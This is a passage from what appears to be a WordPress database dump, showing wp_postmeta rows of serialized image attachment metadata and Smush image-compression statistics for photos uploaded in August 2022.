amera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(546,439,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.8311266660063175;s:5:\"bytes\";i:3481;s:11:\"size_before\";i:90861;s:10:\"size_after\";i:87380;s:4:\"time\";d:0.13;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.4;s:5:\"bytes\";i:378;s:11:\"size_before\";i:2454;s:10:\"size_after\";i:2076;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.13;s:5:\"bytes\";i:556;s:11:\"size_before\";i:10831;s:10:\"size_after\";i:10275;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.32;s:5:\"bytes\";i:406;s:11:\"size_before\";i:4358;s:10:\"size_after\";i:3952;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.22;s:5:\"bytes\";i:668;s:11:\"size_before\";i:15818;s:10:\"size_after\";i:15150;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.57;s:5:\"bytes\";i:1473;s:11:\"size_before\";i:57400;s:10:\"size_after\";i:55927;s:4:\"time\";d:0.08;}}}'),(547,440,'_wp_attached_file','2022/08/18033957_1641106155903819_3439710667750671365_n.jpg'),(548,440,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:720;s:6:\"height\";i:960;s:4:\"file\";s:59:\"2022/08/18033957_1641106155903819_3439710667750671365_n.jpg\";s:8:\"filesize\";s:5:\"73913\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"18033957_1641106155903819_3439710667750671365_n-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"12534\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"18033957_1641106155903819_3439710667750671365_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"5582\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"18033957_1641106155903819_3439710667750671365_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"19938\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"18033957_1641106155903819_3439710667750671365_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3102\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(549,440,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.3357955097677126;s:5:\"bytes\";i:2196;s:11:\"size_before\";i:41156;s:10:\"size_after\";i:38960;s:4:\"time\";d:0.07;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.95;s:5:\"bytes\";i:444;s:11:\"size_before\";i:5582;s:10:\"size_after\";i:5138;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.57;s:5:\"bytes\";i:452;s:11:\"size_before\";i:3102;s:10:\"size_after\";i:2650;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.02;s:5:\"bytes\";i:629;s:11:\"size_before\";i:12534;s:10:\"size_after\";i:11905;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.37;s:5:\"bytes\";i:671;s:11:\"size_before\";i:19938;s:10:\"size_after\";i:19267;s:4:\"time\";d:0.03;}}}'),(550,441,'_wp_attached_file','2022/08/18057957_1641106209237147_2139335743547445839_n.jpg'),(551,441,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/18057957_1641106209237147_2139335743547445839_n.jpg\";s:8:\"filesize\";s:5:\"87827\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"18057957_1641106209237147_2139335743547445839_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"14697\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"18057957_1641106209237147_2139335743547445839_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"6381\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"18057957_1641106209237147_2139335743547445839_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"74300\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"18057957_1641106209237147_2139335743547445839_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"22473\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"18057957_1641106209237147_2139335743547445839_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3431\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(552,441,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.5149486321135868;s:5:\"bytes\";i:4263;s:11:\"size_before\";i:121282;s:10:\"size_after\";i:117019;s:4:\"time\";d:0.16999999999999998;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.09;s:5:\"bytes\";i:919;s:11:\"size_before\";i:22473;s:10:\"size_after\";i:21554;s:4:\"time\";d:0.03;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.88;s:5:\"bytes\";i:442;s:11:\"size_before\";i:3431;s:10:\"size_after\";i:2989;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.47;s:5:\"bytes\";i:657;s:11:\"size_before\";i:14697;s:10:\"size_after\";i:14040;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.38;s:5:\"bytes\";i:1767;s:11:\"size_before\";i:74300;s:10:\"size_after\";i:72533;s:4:\"time\";d:0.05;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.49;s:5:\"bytes\";i:478;s:11:\"size_before\";i:6381;s:10:\"size_after\";i:5903;s:4:\"time\";d:0.06;}}}'),(553,442,'_wp_attached_file','2022/08/18118635_1641106092570492_880445919232503964_n.jpg'),(554,442,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:720;s:6:\"height\";i:960;s:4:\"file\";s:58:\"2022/08/18118635_1641106092570492_880445919232503964_n.jpg\";s:8:\"filesize\";s:5:\"67777\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:58:\"18118635_1641106092570492_880445919232503964_n-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"11710\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:58:\"18118635_1641106092570492_880445919232503964_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"5269\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:58:\"18118635_1641106092570492_880445919232503964_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"19787\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:57:\"18118635_1641106092570492_880445919232503964_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"2923\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(555,442,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.104966111517045;s:5:\"bytes\";i:2423;s:11:\"size_before\";i:39689;s:10:\"size_after\";i:37266;s:4:\"time\";d:0.12000000000000001;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.27;s:5:\"bytes\";i:417;s:11:\"size_before\";i:2923;s:10:\"size_after\";i:2506;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.01;s:5:\"bytes\";i:475;s:11:\"size_before\";i:5269;s:10:\"size_after\";i:4794;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.42;s:5:\"bytes\";i:635;s:11:\"size_before\";i:11710;s:10:\"size_after\";i:11075;s:4:\"time\";d:0.08;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.53;s:5:\"bytes\";i:896;s:11:\"size_before\";i:19787;s:10:\"size_after\";i:18891;s:4:\"time\";d:0.02;}}}'),(556,443,'_wp_attached_file','2022/08/18118866_1641106242570477_8035677580998091915_n.jpg'),(557,443,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/18118866_1641106242570477_8035677580998091915_n.jpg\";s:8:\"filesize\";s:6:\"129967\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"18118866_1641106242570477_8035677580998091915_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"17619\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"18118866_1641106242570477_8035677580998091915_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"6797\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"18118866_1641106242570477_8035677580998091915_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:6:\"104864\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"18118866_1641106242570477_8035677580998091915_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"27759\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"18118866_1641106242570477_8035677580998091915_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3364\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(558,443,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.1152409867645865;s:5:\"bytes\";i:8205;s:11:\"size_before\";i:160403;s:10:\"size_after\";i:152198;s:4:\"time\";d:0.21000000000000002;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.68;s:5:\"bytes\";i:522;s:11:\"size_before\";i:6797;s:10:\"size_after\";i:6275;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.78;s:5:\"bytes\";i:430;s:11:\"size_before\";i:3364;s:10:\"size_after\";i:2934;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.35;s:5:\"bytes\";i:942;s:11:\"size_before\";i:17619;s:10:\"size_after\";i:16677;s:4:\"time\";d:0.03;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.07;s:5:\"bytes\";i:1408;s:11:\"size_before\";i:27759;s:10:\"size_after\";i:26351;s:4:\"time\";d:0.08;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.68;s:5:\"bytes\";i:4903;s:11:\"size_before\";i:104864;s:10:\"size_after\";i:99961;s:4:\"time\";d:0.08;}}}'),(559,444,'_wp_attached_file','2022/08/18119545_1646581548689613_8488233903493088586_n.jpg'),(560,444,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/18119545_1646581548689613_8488233903493088586_n.jpg\";s:8:\"filesize\";s:5:\"63695\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"18119545_1646581548689613_8488233903493088586_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"10868\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"18119545_1646581548689613_8488233903493088586_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"4542\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"18119545_1646581548689613_8488233903493088586_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"55431\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"18119545_1646581548689613_8488233903493088586_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"16135\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"18119545_1646581548689613_8488233903493088586_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"2553\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(561,444,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.236939985926348;s:5:\"bytes\";i:2898;s:11:\"size_before\";i:89529;s:10:\"size_after\";i:86631;s:4:\"time\";d:0.16;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.57;s:5:\"bytes\";i:372;s:11:\"size_before\";i:2553;s:10:\"size_after\";i:2181;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.29;s:5:\"bytes\";i:422;s:11:\"size_before\";i:4542;s:10:\"size_after\";i:4120;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.26;s:5:\"bytes\";i:463;s:11:\"size_before\";i:10868;s:10:\"size_after\";i:10405;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.3;s:5:\"bytes\";i:532;s:11:\"size_before\";i:16135;s:10:\"size_after\";i:15603;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2;s:5:\"bytes\";i:1109;s:11:\"size_before\";i:55431;s:10:\"size_after\";i:54322;s:4:\"time\";d:0.1;}}}'),(562,445,'_wp_attached_file','2022/08/23517652_1851799148167851_4518671867384389908_n.jpg'),(563,445,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/23517652_1851799148167851_4518671867384389908_n.jpg\";s:8:\"filesize\";s:5:\"82512\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"23517652_1851799148167851_4518671867384389908_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"15600\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"23517652_1851799148167851_4518671867384389908_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"6449\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"23517652_1851799148167851_4518671867384389908_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"71921\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"23517652_1851799148167851_4518671867384389908_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"23219\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"23517652_1851799148167851_4518671867384389908_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3455\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(564,445,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.549285501143861;s:5:\"bytes\";i:4282;s:11:\"size_before\";i:120644;s:10:\"size_after\";i:116362;s:4:\"time\";d:0.15;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.24;s:5:\"bytes\";i:467;s:11:\"size_before\";i:6449;s:10:\"size_after\";i:5982;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.87;s:5:\"bytes\";i:410;s:11:\"size_before\";i:3455;s:10:\"size_after\";i:3045;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.36;s:5:\"bytes\";i:680;s:11:\"size_before\";i:15600;s:10:\"size_after\";i:14920;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.56;s:5:\"bytes\";i:826;s:11:\"size_before\";i:23219;s:10:\"size_after\";i:22393;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.64;s:5:\"bytes\";i:1899;s:11:\"size_before\";i:71921;s:10:\"size_after\";i:70022;s:4:\"time\";d:0.09;}}}'),(565,446,'_wp_attached_file','2022/08/23795383_1868197219861377_192834509148892931_n.jpg'),(566,446,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:58:\"2022/08/23795383_1868197219861377_192834509148892931_n.jpg\";s:8:\"filesize\";s:6:\"160120\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:58:\"23795383_1868197219861377_192834509148892931_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"21001\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:58:\"23795383_1868197219861377_192834509148892931_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"7801\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:58:\"23795383_1868197219861377_192834509148892931_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:6:\"127444\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:58:\"23795383_1868197219861377_192834509148892931_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"32381\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:57:\"23795383_1868197219861377_192834509148892931_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3712\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(567,446,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.9759071223204865;s:5:\"bytes\";i:11494;s:11:\"size_before\";i:192339;s:10:\"size_after\";i:180845;s:4:\"time\";d:0.22;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.82;s:5:\"bytes\";i:688;s:11:\"size_before\";i:7801;s:10:\"size_after\";i:7113;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.34;s:5:\"bytes\";i:495;s:11:\"size_before\";i:3712;s:10:\"size_after\";i:3217;s:4:\"time\";d:0.06;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.05;s:5:\"bytes\";i:1271;s:11:\"size_before\";i:21001;s:10:\"size_after\";i:19730;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.95;s:5:\"bytes\";i:1926;s:11:\"size_before\";i:32381;s:10:\"size_after\";i:30455;s:4:\"time\";d:0.03;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.58;s:5:\"bytes\";i:7114;s:11:\"size_before\";i:127444;s:10:\"size_after\";i:120330;s:4:\"time\";d:0.1;}}}'),(568,447,'_wp_attached_file','2022/08/23843260_1868197133194719_3148537784022538449_n.jpg'),(569,447,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/23843260_1868197133194719_3148537784022538449_n.jpg\";s:8:\"filesize\";s:6:\"161538\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"23843260_1868197133194719_3148537784022538449_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"21003\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"23843260_1868197133194719_3148537784022538449_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"7740\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"23843260_1868197133194719_3148537784022538449_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:6:\"128667\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"23843260_1868197133194719_3148537784022538449_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"32448\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"23843260_1868197133194719_3148537784022538449_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3637\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(570,447,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.9159151399260965;s:5:\"bytes\";i:11447;s:11:\"size_before\";i:193495;s:10:\"size_after\";i:182048;s:4:\"time\";d:0.18;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.63;s:5:\"bytes\";i:668;s:11:\"size_before\";i:7740;s:10:\"size_after\";i:7072;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.17;s:5:\"bytes\";i:479;s:11:\"size_before\";i:3637;s:10:\"size_after\";i:3158;s:4:\"time\";d:0.02;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.1;s:5:\"bytes\";i:1282;s:11:\"size_before\";i:21003;s:10:\"size_after\";i:19721;s:4:\"time\";d:0.03;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.78;s:5:\"bytes\";i:1874;s:11:\"size_before\";i:32448;s:10:\"size_after\";i:30574;s:4:\"time\";d:0.03;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.55;s:5:\"bytes\";i:7144;s:11:\"